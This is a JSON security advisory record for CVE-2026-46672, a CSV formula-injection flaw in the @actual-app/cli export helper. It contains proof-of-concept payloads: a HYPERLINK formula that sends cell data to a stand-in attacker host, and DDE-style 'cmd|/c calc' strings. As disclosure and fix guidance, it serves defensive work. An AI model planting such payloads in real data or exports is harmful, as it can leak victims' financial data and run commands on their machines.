{"id":"CVE-2026-46672","title":"@actual-app/cli `--format csv` Output Vulnerable to CSV Formula Injection via Custom `escapeCsv` Helper","summary":"@actual-app/cli `--format csv` Output Vulnerable to CSV Formula Injection via Custom `escapeCsv` Helper","severity":"medium","cvss":4.6,"cwe":["CWE-1236"],"vendor":"actual-app","product":"@actual-app/cli","ecosystem":"npm","affected":["@actual-app/cli < 26.6.0"],"patched":["@actual-app/cli 26.6.0"],"published":"2026-06-22","updated":"2026-06-22","source":"GHSA","sourceUrl":"https://github.com/advisories/GHSA-7gh7-258j-4mpq","references":[{"url":"https://github.com/actualbudget/actual/security/advisories/GHSA-7gh7-258j-4mpq"},{"url":"https://github.com/advisories/GHSA-7gh7-258j-4mpq"}],"tags":["ghsa","npm"],"ingestedAt":"2026-06-29T13:24:35.501Z","epss":0.00187,"epssPercentile":0.08562,"slug":"CVE-2026-46672","body":"## Overview\n\n## Summary\n\n`@actual-app/cli` ships a hand-rolled CSV serializer in `packages/cli/src/output.ts` (used whenever the global `--format csv` option is passed) whose `escapeCsv` helper only handles RFC 4180 delimiter/quote/newline escaping. It does **not** neutralize the standard CSV formula-injection prefixes (`=`, `+`, `-`, `@`, `\\t`, `\\r`). Any CLI command that streams an object array containing user-controlled strings — `transactions list`, `accounts list`, `payees list`, `categories list`, `tags list`, `category-groups list`, `rules list`, `schedules list`, `query` — will emit cells that auto-evaluate when the resulting CSV is opened in Excel, LibreOffice Calc, or Google Sheets, enabling data exfiltration (`=HYPERLINK(...)`, `=WEBSERVICE(...)`) and arbitrary formula execution.\n\nThis is a **distinct variant** of the formula-injection surface in `packages/loot-core/src/server/transactions/export/export-to-csv.ts` (which uses `csv-stringify` and would need a separate `cast` option fix) — they are different files, different packages, and different serializers. Fixing one does not fix the other.\n\n## Details\n\n### Vulnerable code\n\n`packages/cli/src/output.ts:98-103`:\n\n```ts\nfunction escapeCsv(value: string): string {\n  if (value.includes(',') || value.includes('\"') || value.includes('\\n')) {\n    return '\"' + value.replace(/\"/g, '\"\"') + '\"';\n  }\n  return value;\n}\n```\n\nThe helper performs only delimiter/quote/newline neutralization, which is sufficient for RFC 4180 *parsing* but irrelevant to spreadsheet *formula evaluation*. CSV double-quoting is invisible to Excel/Calc/Sheets — the unquoted cell value `=HYPERLINK(\"http://attacker/?d=\"&B2,\"Click\")` is still parsed as a formula by the spreadsheet, even when wrapped as `\"=HYPERLINK(\"\"http://attacker/?d=\"\"&B2,\"\"Click\"\")\"` on disk.\n\n### Data flow to the sink\n\n1. The global `--format` option is registered at `packages/cli/src/index.ts:53-57` with `choices(['json','table','csv'])` and applies to every subcommand.\n2. List/query subcommands invoke `printOutput(data, format)` (`output.ts:105-107`), which routes `format === 'csv'` to `formatCsv` (`output.ts:71-96`).\n3. For each row, every column is run through `formatCellValue` (`output.ts:21-26`):\n   ```ts\n   function formatCellValue(key: string, value: unknown): string {\n     if (isAmountValue(key, value)) {\n       return (value / 100).toFixed(2);\n     }\n     return String(value ?? '');\n   }\n   ```\n   Only the fixed `AMOUNT_FIELDS` set (`amount`, `balance`, `budgeted`, etc.) gets numeric coercion. User-controlled string fields — `payee.name`, `account.name`, `category.name`, `notes`, tag names, rule descriptions, schedule names — are passed verbatim to `escapeCsv`.\n4. `escapeCsv` returns the value unmodified unless it contains `,`, `\"`, or `\\n`. A payload such as `=1+1`, `@SUM(...)`, `+1+cmd|'/c calc'!A0`, or `-2+3+cmd|'/c calc'!A0` therefore lands in the output as a leading-character formula.\n\n### Exploitability conditions\n\n- The CLI is installed and used by the victim (`@actual-app/cli` is published with `\"bin\": { \"actual\": \"./dist/cli.js\", \"actual-cli\": \"./dist/cli.js\" }`).\n- The attacker can persist a malicious string in any user-controlled field of the budget. Realistic vectors:\n  - Co-user / co-collaborator of a synced budget (multi-device, or attacker-controlled sync server).\n  - Sending the victim a crafted OFX/QIF/CSV import file.\n  - API write access (e.g., over a compromised sync session).\n- The victim runs `actual <list-cmd> --format csv > out.csv` and opens `out.csv` in a spreadsheet program. CSV files generated locally by the CLI are not gated by Office Protected View / Mark-of-the-Web, so formulas evaluate immediately.\n\nThere are **no mitigations** in the code path: no allowlist, no sanitizer, no `cast` option, no warning, and the CLI is shipped to end users via npm.\n\n## PoC\n\nSetup (one-time — choose any user-controlled field; payee shown):\n\n```bash\n# Inject via the CLI's own write path (or via OFX/QIF/CSV import, or shared sync):\nactual transactions add \\\n  --account \"$ACCOUNT_ID\" \\\n  --data '[{\"payee_name\":\"=HYPERLINK(\\\"http://attacker.evil/leak?d=\\\"&B2,\\\"Bank refund\\\")\",\"date\":\"2026-01-01\",\"amount\":10000}]'\n```\n\nTrigger (victim runs):\n\n```bash\nactual transactions list --account \"$ACCOUNT_ID\" --start 2026-01-01 --end 2026-12-31 --format csv > out.csv\ncat out.csv\n```\n\nObserved output (abridged; quoting is RFC 4180-correct but the formula prefix is preserved):\n\n```\nid,date,amount,payee,notes,category,account,cleared,reconciled\nabc...,2026-01-01,100.00,\"=HYPERLINK(\"\"http://attacker.evil/leak?d=\"\"&B2,\"\"Bank refund\"\")\",,,Checking,false,false\n```\n\nOpen `out.csv` in Excel / LibreOffice Calc / Google Sheets → the `payee` cell renders as a clickable hyperlink that, when clicked (or auto-fetched in some configurations), exfiltrates neighboring cell content (`B2` = the date, but trivially adjustable to any cell) to the attacker.\n\nMinimal-payload variants that bypass `escapeCsv` entirely (no `,`, `\"`, or `\\n` → no quoting at all):\n\n- Payee name `=1+1` → cell shows `2`.\n- Payee name `@SUM(1+1)` → cell shows `2`.\n- Payee name `+1+1` → cell shows `2`.\n- Payee name `-2+3` → cell shows `1`.\n\nThe same applies to other list commands sharing the global `--format` option:\n\n```bash\nactual accounts list   --format csv      # account.name\nactual payees   list   --format csv      # payee.name\nactual categories list --format csv      # category.name\nactual tags list       --format csv\nactual category-groups list --format csv\nactual rules list      --format csv\nactual schedules list  --format csv\nactual query \"...\"     --format csv\n```\n\nVerified by reading `escapeCsv` (`packages/cli/src/output.ts:98-103`): the only escape triggers are `,`, `\"`, `\\n`, and even when triggered the leading character is preserved.\n\n## Impact\n\n- **Data exfiltration** in the victim's spreadsheet context via `=HYPERLINK(...)`, `=WEBSERVICE(...)`, `=IMPORTXML(...)` (Sheets), `=IMPORTDATA(...)` (Sheets) — typically one click for HYPERLINK, fully automatic for WEBSERVICE/IMPORT* on confirmation. Victim's financial data (account names, balances, transactions in adjacent cells) is the natural exfil target.\n- **Arbitrary formula execution** in the victim's spreadsheet context, including legacy DDE-style payloads on outdated Excel installations (potential RCE).\n- **Trust-boundary crossing**: financial data the victim assumes is \"exported\" becomes attacker-controlled active content. The CLI is the victim's own trusted tool; users do not expect `actual transactions list --format csv` to produce a file that runs code.\n\nBlast radius is bounded by the requirement that the attacker plant a string in a user-controlled field and the victim opens the CSV in a spreadsheet — but both are realistic for a personal-finance app whose primary export workflow is \"open in Excel\".\n\n## Recommended Fix\n\nNeutralize formula-trigger prefixes in `escapeCsv` *before* the existing RFC 4180 quoting. Example:\n\n```ts\n// packages/cli/src/output.ts\nconst FORMULA_TRIGGERS = /^[=+\\-@\\t\\r]/;\n\nfunction escapeCsv(value: string): string {\n  // Neutralize spreadsheet formula prefixes (CWE-1236).\n  if (FORMULA_TRIGGERS.test(value)) {\n    value = \"'\" + value;\n  }\n  if (value.includes(',') || value.includes('\"') || value.includes('\\n')) {\n    return '\"' + value.replace(/\"/g, '\"\"') + '\"';\n  }\n  return value;\n}\n```\n\nThe leading single-quote is the OWASP-recommended neutralizer: it is stripped by Excel/Calc on display but prevents formula evaluation. Apply the same fix in `packages/loot-core/src/server/transactions/export/export-to-csv.ts` by passing a `cast` option to `csv-stringify` that prepends `'` to any string starting with a formula trigger — the two sites are independent and both must be patched.\n\n## Affected packages\n\n- `@actual-app/cli < 26.6.0`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `@actual-app/cli 26.6.0`","depth":"sunlit","depthScore":25,"depthScoreParts":{"impact":25.3,"likelihood":0,"exploitation":0,"ransomware":0},"changes":[]}